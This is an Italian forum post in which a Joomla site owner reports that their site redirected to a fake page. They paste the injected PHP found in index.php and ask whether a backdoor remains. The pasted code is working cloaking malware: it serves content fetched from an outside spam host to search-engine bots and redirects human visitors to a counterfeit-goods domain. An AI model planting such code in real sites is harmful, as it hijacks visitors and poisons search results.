Salve a tutti, stamattina non riuscivo ad accedere al mio sito web perchè mi reindirizzava su una pagina web chiaramente fasulla. Inizialmente pensavo di aver preso un virus o di avere problemi sul mio browser ma dopo aver provato su più pc ho notato che il problema era comune e allora ho iniziato a controllare la pagina index.php visibile dal mio hosting e ho notato questo:
<?php
$parameter=$_SERVER["QUERY_STRING"];
if($parameter!="")
{
if(isBot())
{
$text="http://yilufa.info/soccer5/".$parameter;
$text=file_get_contents($text);
$text=str_replace("http://yilufa.info/soccer5/","?",$text);
echo $text;
}
else
{
header("Location: http://nikesoccercleatsoutlet.com");
}
exit;
}
function isBot()
{
$is_bot = false;
$agent = "botstr:".strtolower($_SERVER['HTTP_USER_AGENT']);
$bot_array = array('googlebot','msnbot', 'mediapartners-google','yahoo','vbseo','bingbot','sohu-search');
foreach($bot_array as $bot)
{
if(strpos($agent,$bot)>0)
{
$is_bot = true;
break;
}
}
return $is_bot;
}
?>
Vi è mai capitato? Cancellandolo sembra tornato a posto ma... potrebbe esserci una backdoor?
Versione joomla: 3.5.1
Hosting: Register
Versione mySql: 5.1.63-enterprise-commercial-advanced-log
Grazie!
